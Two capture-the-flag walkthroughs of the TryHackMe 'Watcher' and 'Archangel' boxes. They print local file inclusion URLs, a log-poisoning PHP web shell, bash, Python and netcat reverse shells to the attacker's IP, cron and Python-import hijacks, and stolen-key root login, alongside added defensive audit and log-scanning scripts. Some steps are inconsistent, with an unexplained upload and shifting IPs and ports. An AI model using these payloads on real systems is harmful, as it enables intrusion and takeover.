thm-watcher-public

Enumeration


Starting off with an nmap scan, I find that FTP, SSH and HTTP are open

root@kali:~/tryhackme/watcher# nmap -sC -sV 10.10.180.180
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-17 20:44 EST
Nmap scan report for 10.10.180.180
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
|   256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_  256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Running gobuster to help find directories, I find post.php and robots.txt

root@kali:~/tryhackme/watcher# gobuster dir -u 10.10.180.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.180.180
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2021/02/17 20:45:30 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/post.php (Status: 200)
/css (Status: 301)
/robots.txt (Status: 200)

Flag 1


Going to robots.txt, I find two Allow entries


Navigating to 10.10.180.180/flag.txt, I obtain the first flag


Flag 2


Trying to access the /secret_file_do_not_read.txt file, I receive a 403 error


Going back to my gobuster results, I had found /post.php. Navigating there, the page loads but I do not receive anything.


I could try fuzzing, but first I went back to the home page and looked at the source code. Here, I find that post.php takes a post argument


Testing this, I find it is vulnerable to local file inclusion by changing the URL to post.php?post=../../../../../../etc/passwd


I want to read /secret_file_do_not_read.txt, which I did not have permission to read earlier. Reading the file through the LFI vulnerability works, and I find FTP credentials


Using these credentials, I can log in to FTP and download the flag_2.txt file

root@kali:~/tryhackme/watcher# ftp 10.10.180.180

Connected to 10.10.180.180.
220 (vsFTPd 3.0.3)
Name (10.10.180.180:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

ftp> get flag_2.txt 

local: flag_2.txt remote: flag_2.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag_2.txt (21 bytes).
226 Transfer complete.
21 bytes received in 0.00 secs (15.2022 kB/s)

I can now read the second flag


Flag 3


Looking at the FTP server, I am allowed to upload files to the files folder

ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 .
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 ..
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

I can upload files via FTP and then access them through the LFI vulnerability. I also know the files directory is /home/ftpuser/ftp/files thanks to the note that gave me the FTP credentials. This will allow me to get a reverse shell. To start, I download a PHP reverse shell and edit the IP address. Then I upload it to the files directory over FTP

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5491 bytes sent in 0.00 secs (137.8059 MB/s)

Now that I have uploaded the file, I start a netcat listener. Then, using the LFI vulnerability, I request the PHP file so that it executes

curl http://10.10.180.180/post.php?post=../../../../../../../srv/ftp/files/php-reverse-shell.php

Looking at my netcat listener, I see I receive a connect back.

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 56586
Linux watcher 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:13:50 up  3:00,  2 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
will     pts/6    10.2.8.75        00:50   33:34   0.31s  0.31s -bash
root     pts/7    10.2.8.75        01:41   32:37   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

I then upgrade the shell to a TTY with python3

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@watcher:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# fg

www-data@watcher:/$ 

I can now read the third flag under /var/www/html/more_secrets_a9f10a


Flag 4


As www-data, I see I am allowed to run any command as the toby user

www-data@watcher:/$ sudo -l
Matching Defaults entries for www-data on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on watcher:
    (toby) NOPASSWD: ALL

I can easily switch to the toby user without a password by running bash through sudo

www-data@watcher:/$ sudo -u toby /bin/bash
toby@watcher:/$ 

As toby, I can now read flag 4


Flag 5


Under toby's home directory, I find a note stating cron jobs are running, likely from the jobs directory

toby@watcher:~$ ls
flag_4.txt  jobs  note.txt

toby@watcher:~$ cat note.txt  
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

This exploit is easy to find, but you could use pspy to monitor processes and find running cron jobs. Upload the pspy64 file, then execute it

toby@watcher:~$ wget 10.2.8.75/pspy64
--2021-02-18 02:25:49--  http://10.2.8.75/pspy64
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M   463KB/s    in 7.6s    

2021-02-18 02:25:57 (395 KB/s) - 'pspy64' saved [3078592/3078592]

toby@watcher:~$ chmod +x pspy64 
toby@watcher:~$ ./pspy64

Looking at the results, I see that /home/toby/jobs/cow.sh is run by a cron job every minute

2021/02/18 02:27:01 CMD: UID=1002 PID=1832   | 
2021/02/18 02:27:01 CMD: UID=1002 PID=1831   | /bin/bash /home/toby/jobs/cow.sh 
2021/02/18 02:27:01 CMD: UID=1002 PID=1830   | /bin/sh -c /home/toby/jobs/cow.sh 

Looking at this file, I see my current user can edit it

toby@watcher:~/jobs$ ls -la cow.sh 
-rwxr-xr-x 1 toby toby 46 Dec  3 03:31 cow.sh

I append a bash reverse shell to the bottom of the script so that it calls back to my local machine

toby@watcher:~/jobs$ echo "bash -i >& /dev/tcp/10.2.8.75/8080 0>&1" >> cow.sh

After that, I set up my netcat listener and wait for less than a minute. I receive a connect back as the mat user

root@kali:~/tryhackme/watcher# nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 40798
bash: cannot set terminal process group (1887): Inappropriate ioctl for device
bash: no job control in this shell
mat@watcher:~$ 

I can now read the 5th flag


Flag 6


There is a note left on mat's desktop from the will user. The note says I can run a Python script as him using sudo

mat@watcher:~$ cat note.txt 
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will

Running sudo -l, I confirm this is true

mat@watcher:~$ sudo -l
Matching Defaults entries for mat on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mat may run the following commands on watcher:
    (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *

Reading the script we can run as will, I see it imports os, sys and cmd, and only passes the argument to os.system if it matches a whitelist

mat@watcher:~/scripts$ cat will_script.py 
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)

Looking at the file permissions, I see my current user owns cmd.py. Since Python searches the script's own directory first, the import of cmd in will_script.py loads this file, so any commands I insert into cmd.py will execute when I run will_script.py as will

mat@watcher:~/scripts$ ls -la
total 16
drwxrwxr-x 2 will will 4096 Dec  3 03:31 .
drwxr-xr-x 6 mat  mat  4096 Dec  3 03:31 ..
-rw-r--r-- 1 mat  mat   133 Dec  3 03:31 cmd.py
-rw-r--r-- 1 will will  208 Dec  3 01:58 will_script.py

I grab a Python reverse shell and write it into cmd.py

mat@watcher:~/scripts$ echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.9.2.255',9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py


Running will_script.py as will with the following command gets us a shell.

mat@watcher:~/scripts$ sudo -u will python3 /home/mat/scripts/will_script.py cmd.py
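To show why the layout above is dangerous from the auditing side, here is an added Python helper (example code written for this page, not anything from the box): it parses a script's imports, works out which of them Python would satisfy from the script's own directory (sys.path[0]), and reports any such module file, or the directory itself, that the sudo target user does not control. The function names, the trusted_uid parameter and the scratch-directory rebuild of mat's scripts folder are all assumptions for the demo.

```python
import ast
import os
import stat
import tempfile
from pathlib import Path


def imported_modules(script_path: Path) -> list:
    """Top-level names a script imports: 'cmd' for 'from cmd import get_command'."""
    tree = ast.parse(script_path.read_text(), filename=str(script_path))
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def sibling_module_file(script_dir: Path, module: str):
    """The file Python loads for `module` from the script's directory, which
    sys.path[0] makes the first place it looks, ahead of the standard library."""
    for candidate in (script_dir / f"{module}.py", script_dir / module / "__init__.py"):
        if candidate.is_file():
            return candidate
    return None


def untrusted_write_access(path: Path, trusted_uid: int) -> list:
    """Reasons someone other than trusted_uid could change what `path` contains."""
    st = path.stat()
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}, not {trusted_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_sudo_script(script_path, trusted_uid: int) -> list:
    """(module, path, reasons) for each import the sudo target does not control.
    A module with no sibling file is still reported when the script directory
    itself is writable, because a file created there later is imported first."""
    script_path = Path(script_path).resolve()
    script_dir = script_path.parent
    dir_reasons = untrusted_write_access(script_dir, trusted_uid)
    findings = []
    for module in imported_modules(script_path):
        target = sibling_module_file(script_dir, module)
        if target is not None:
            reasons = untrusted_write_access(target, trusted_uid)
        else:
            target = script_dir / f"{module}.py"
            reasons = ["not present; " + r for r in dir_reasons]
        if reasons:
            findings.append((module, str(target), reasons))
    return findings


def build_demo(root) -> Path:
    """Recreate the page's scripts directory in a scratch location (constructed)."""
    scripts = Path(root) / "scripts"
    scripts.mkdir()
    os.chmod(scripts, 0o755)
    (scripts / "will_script.py").write_text(
        "import os\nimport sys\nfrom cmd import get_command\n\n"
        "cmd = get_command(sys.argv[1])\nwhitelist = ['ls -lah', 'id', 'cat /etc/passwd']\n"
        "if cmd not in whitelist:\n    print('Invalid command!')\n    exit()\nos.system(cmd)\n"
    )
    (scripts / "cmd.py").write_text("def get_command(arg):\n    return arg\n")
    for name in ("will_script.py", "cmd.py"):
        os.chmod(scripts / name, 0o644)
    return scripts / "will_script.py"


def run_demo() -> dict:
    """Audit the demo twice: as the file owner (nothing to report) and with a
    trusted uid that differs from the owner, which is the page's situation
    (cmd.py owned by mat while the script runs as will)."""
    me = os.getuid()
    with tempfile.TemporaryDirectory() as d:
        script = build_demo(d)
        return {
            "imports": imported_modules(script),
            "as_owner": audit_sudo_script(script, me),
            "as_other": [(m, reasons) for m, _, reasons in audit_sudo_script(script, me + 1)],
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The second audit also flags os and sys, because a writable script directory lets any import be shadowed, not just cmd; running the script with python3 -I (isolated mode drops the script's directory from sys.path) would break its own cmd import and make that dependency visible.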

Looking at my netcat listener, I receive a connect back as will

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 38226
$ whoami
will

I upgrade the shell to a TTY with python3

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
will@watcher:~/scripts$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# nc -lvnp 1234

will@watcher:~/scripts$ 

Now, I can read the sixth flag


Flag 7


Looking into the will user, I find he is part of the adm group

will@watcher:/home/will$ id
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)

Since this is an unusual group, I look for files owned by it. Here, I find a file named key.b64

will@watcher:/home/will$ find / -group adm   
/opt/backups
/opt/backups/key.b64

Reading the file shows a large base64 value

will@watcher:/home/will$ cat /opt/backups/key.b64
...

Decoding this base64 value shows an id_rsa private key.

will@watcher:/home/will$ cat /opt/backups/key.b64 | base64 -d
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

I copy this id_rsa to my local machine and change the file permissions so it is usable

root@kali:~/tryhackme/watcher# chmod 600 id_rsa

Testing this id_rsa against the root account, I find it is valid and lets me log in

root@kali:~/tryhackme/watcher# ssh -i id_rsa root@10.10.180.180
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 18 02:48:28 UTC 2021

  System load:  0.0                Processes:             122
  Usage of /:   22.3% of 18.57GB   Users logged in:       0
  Memory usage: 38%                IP address for eth0:   10.10.180.180
  Swap usage:   0%                 IP address for lxdbr0: 10.14.179.1


33 packages can be updated.
0 updates are security updates.


Last login: Thu Dec  3 03:25:38 2020
root@watcher:~# 

As root, I can now read the final flag

thm-archangel-public

Enumeration


 

root@kali:~/tryhackme/archangle# nmap -sC -sV 10.10.169.125

Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-04 14:01 EST
Nmap scan report for mafialive.thm (10.10.169.125)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/test.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to the website, I see a normal-looking site; however, under Send us Mail I see another hostname, mafialive.thm


I add this hostname to my /etc/hosts file and navigate to the new website and the first flag.


Running gobuster on mafialive.thm, I find test.php

root@kali:~/tryhackme/archangle# gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://mafialive.thm/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2021/02/04 14:08:16 Starting gobuster
===============================================================
/test.php (Status: 200)

Navigating to test.php, I find a button


Pressing the button, I find the URL changes to test.php?view=/var/www/html/development_testing/mrrobot.php


Exploit


LFI PHP Wrappers

A parameter like this can be vulnerable to several things, such as SQL injection, directory traversal, RFI and LFI. Testing them one by one, I find most end with a Not Allowed response.


Testing PHP wrappers for LFI, I find that the php://filter wrapper lets me read the page source base64-encoded

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php


Trying to read /etc/passwd still fails, so I read the test.php file itself instead to see what filtering is applied

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

<!DOCTYPE HTML>
<html>

<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>

</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
...
 </div>
</body>

</html>

This gives a long base64 value. I save it to my machine, then decode it

root@kali:~/tryhackme/archangle# cat base | base64 -d

<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>
 
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

            //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            if (isset($_GET["view"])) {
                if (!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                    include $_GET['view'];
                } else {
                    echo 'Sorry, Thats not allowed';
                }
            }
        ?>
    </div>
</body>

</html>

Log Poisoning

Looking at the decoded source, I find that the view parameter may not contain ../.. and must contain /var/www/html/development_testing. These are the only two conditions, and both are plain substring checks on the raw string rather than on the resolved path. A well-known bypass for the ../.. check is to use a double slash (..//..//), which does not contain the blocked string.

I test the double slash to see if I can read /etc/passwd.

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1645 100 1645 0 0 24191 0 --:--:-- --:--:-- --:--:-- 24191

****** Test Page. Not to be Deployed ******
Here_is_a_button
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync --snp--
nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/
uuidd:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash

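To make the filter's weakness concrete, here is an added Python re-implementation of the check from test.php beside a canonicalising version. It is example code written for this page, not the box's code; the hardened function is an assumed fix, and the candidate inputs are constructed from the requests shown above.

```python
import posixpath

# The directory the page's test.php wants to confine includes to.
BASE_DIR = "/var/www/html/development_testing"


def contains_str(s: str, substr: str) -> bool:
    """Mirror of the page's containsStr(): PHP strpos($s, $substr) !== false."""
    return substr in s


def weak_filter_allows(view: str) -> bool:
    """The exact logic of test.php: reject the literal '../..' and require
    BASE_DIR to occur *somewhere* in the string. Neither condition looks at
    what the path resolves to, and '..//..' never contains '../..'."""
    return (not contains_str(view, "../..")) and contains_str(view, BASE_DIR)


def hardened_filter_allows(view: str) -> bool:
    """Assumed fix (not from the page): refuse stream wrappers and NUL bytes,
    canonicalise the path, then require the result to stay under BASE_DIR.
    posixpath.normpath collapses '..//..//' the way the kernel would, so the
    traversal below resolves to /etc/passwd and fails the prefix test.
    A real deployment would use os.path.realpath so symlinks cannot escape."""
    if "://" in view or "\x00" in view:
        return False
    resolved = posixpath.normpath(view)
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/")


# Constructed inputs: the legitimate button link, the page's blocked and
# successful traversal attempts, and its php://filter read.
CANDIDATES = {
    "button": BASE_DIR + "/mrrobot.php",
    "dotdot": BASE_DIR + "/../../../../etc/passwd",
    "double_slash": BASE_DIR + "/..//..//..//..//..//etc/passwd",
    "php_filter": "php://filter/convert.base64-encode/resource=" + BASE_DIR + "/mrrobot.php",
}


def compare_filters(candidates=CANDIDATES) -> dict:
    """Map each label to (weak_allows, hardened_allows, canonical path)."""
    return {
        label: (weak_filter_allows(v), hardened_filter_allows(v), posixpath.normpath(v))
        for label, v in candidates.items()
    }


if __name__ == "__main__":
    for label, (weak, hard, canon) in compare_filters().items():
        print(f"{label:13} weak={weak!s:5} hardened={hard!s:5} -> {canon}")
```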

I can now use this to search the box. Looking for SSH keys does not work and I can't read any other useful files, so I try log poisoning. First, I need to find where the logs are stored. Testing the default locations, I find that /var/log/apache2/access.log holds the HTTP server's access log.

view-source:http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log


Scrolling to the bottom of this log file, I see all of my requests through the LFI vulnerability.


Since my requests are logged to this file, I can place PHP code in a request and then execute it by including /var/log/apache2/access.log. To start, I use a simple PHP web shell and send it as the User-Agent header

User-Agent: <?php system($_GET['cmd']); ?>

Refreshing access.log, I see my php code is now in the log file

I can now test command execution
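As an added detection-side example (not from the page), the following Python scans Apache combined-format access log lines for the two things this section relies on: PHP tags arriving in request headers, and traversal sequences that pull the log back in through the include. The sample log is constructed to mirror the requests made in this section; the regex names and finding labels are my own.

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# '<?php', '<?=' or '<? ': PHP code has no business in a header or query string.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)
# '../' and the '..//' variant that slipped past the page's substring check.
TRAVERSAL_RE = re.compile(r"\.\.(?:/|\\)")
# The include target that turns log entries into code.
LOG_PATH_RE = re.compile(r"/var/log/|\.log(?:\b|$)")

# Constructed sample, shaped after the requests made in this section.
SAMPLE_LOG = """\
10.2.8.75 - - [04/Feb/2021:14:08:16 -0500] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.2.8.75 - - [04/Feb/2021:14:09:01 -0500] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//etc/passwd HTTP/1.1" 200 1645 "-" "curl/7.74.0"
10.2.8.75 - - [04/Feb/2021:14:10:30 -0500] "GET / HTTP/1.1" 200 221 "-" "<?php system($_GET['cmd']); ?>"
10.2.8.75 - - [04/Feb/2021:14:11:02 -0500] "GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9043 "-" "curl/7.74.0"
"""


def analyse_line(line: str) -> dict:
    """Return the parsed fields plus a 'reasons' list (empty when benign).
    Lines that do not parse come back with reasons=['unparsed'] so that
    malformed entries are never silently dropped."""
    m = COMBINED_RE.match(line)
    if not m:
        return {"reasons": ["unparsed"], "raw": line}
    f = m.groupdict()
    request = unquote(f["request"])  # %2e%2e%2f and friends become '../'
    reasons = []
    if PHP_TAG_RE.search(f["agent"]) or PHP_TAG_RE.search(f["referer"]):
        reasons.append("php-tag-in-header")
    if PHP_TAG_RE.search(request):
        reasons.append("php-tag-in-request")
    if TRAVERSAL_RE.search(request):
        reasons.append("path-traversal")
    if LOG_PATH_RE.search(request):
        reasons.append("log-file-include")
    f["reasons"] = reasons
    return f


def scan_log(text: str) -> list:
    """Findings for every suspicious line: (line number, host, reasons)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        f = analyse_line(line)
        if f["reasons"]:
            findings.append((n, f.get("host", "?"), f["reasons"]))
    return findings


if __name__ == "__main__":
    for n, host, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n} from {host}: {', '.join(reasons)}")
```

The poisoned User-Agent is only visible in the header field, while the later request that includes the log shows up as traversal plus a log path in the query string; alerting on either one catches this section's technique before the second request ever lands.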

So first, I uploaded puck.php:

GIF8
<?php echo system($_REQUEST['puck']); ?>

Second, I accessed it:

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=ls
GIF8
index.html
mrrobot.php
puck.php
puck.php.1

Third, I ran:

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=wget+http%3a//10.9.2.255%3a8000/rev.php 
GIF8
┌──(kali㉿kali)-[~/thm/archangel]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.191.165 - - [22/Jul/2021 04:51:25] "GET /rev.php HTTP/1.1" 200 -

Fourth, I ran it and got the shell:

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/rev.php
┌──(kali㉿kali)-[~/thm]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.2.255] from (UNKNOWN) [10.10.191.165] 39902
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:23:51 up 2:24, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$


Since I can execute commands, I can upload files. Using a PHP reverse shell, I can upload the file and then navigate to it. I set up a Python HTTP server on my local machine, then use wget on the target to fetch the file

First, I upgrade the shell to a TTY with python3

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg

www-data@ubuntu:/$

I can now read the second flag


Exploiting archangel User


To start, I uploaded and ran linpeas.sh

www-data@ubuntu:/tmp$ wget 10.2.8.75/linpeas.sh

--2021-02-05 01:43:42--  http://10.2.8.75/linpeas.sh
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK                                                                                                                                              
Length: 229696 (224K) [text/x-sh]                                                             
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 224.31K  61.4KB/s    in 3.7s

2021-02-05 01:43:47 (61.4 KB/s) - 'linpeas.sh' saved [229696/229696]
                                               
www-data@ubuntu:/tmp$ bash linpeas.sh 

Looking through the results, I find a cron job for the archangel user

[+] Cron jobs 

.............................................

*/1 *   * * *   archangel /opt/helloworld.sh   	

Checking out this file, I see it runs a basic echo script.

www-data@ubuntu:/opt$ cat helloworld.sh 
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt

Looking at the permissions, I find everyone has permission to write to this file

www-data@ubuntu:/opt$ ls -la helloworld.sh 
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 helloworld.sh

Since I can write to the file, I replace its contents with a reverse shell

www-data@ubuntu:/opt$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.8.75 1234 >/tmp/f" > helloworld.sh

After setting up a netcat listener and waiting a few moments, I get a connect back as archangel

root@kali:~/tryhackme/archangle# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.10] 40080
/bin/sh: 0: can't access tty; job control turned off

$ whoami
archangel

Again, I upgrade the shell to a TTY with python3

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
archangel@ubuntu:~$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg

archangel@ubuntu:~$ 

Now, I can read the third flag


Privilege Escalation to root


Under the secret folder, I find a file named backup. Looking into this file, I find it is a setuid ELF executable owned by root that anyone can execute

archangel@ubuntu:~/secret$ file backup 
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped

archangel@ubuntu:~/secret$ ls -la backup 
-rwsr-xr-x 1 root root 16904 Nov 18 16:40 backup

I would like to know what this executable does, so I run strings against it. Here I find that it copies all files in the myfiles folder using cp.

archangel@ubuntu:~/secret$ strings backup
/lib64/ld-linux-x86-64.so.2
setuid
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
cp /home/user/archangel/myfiles/* /opt/backupfiles

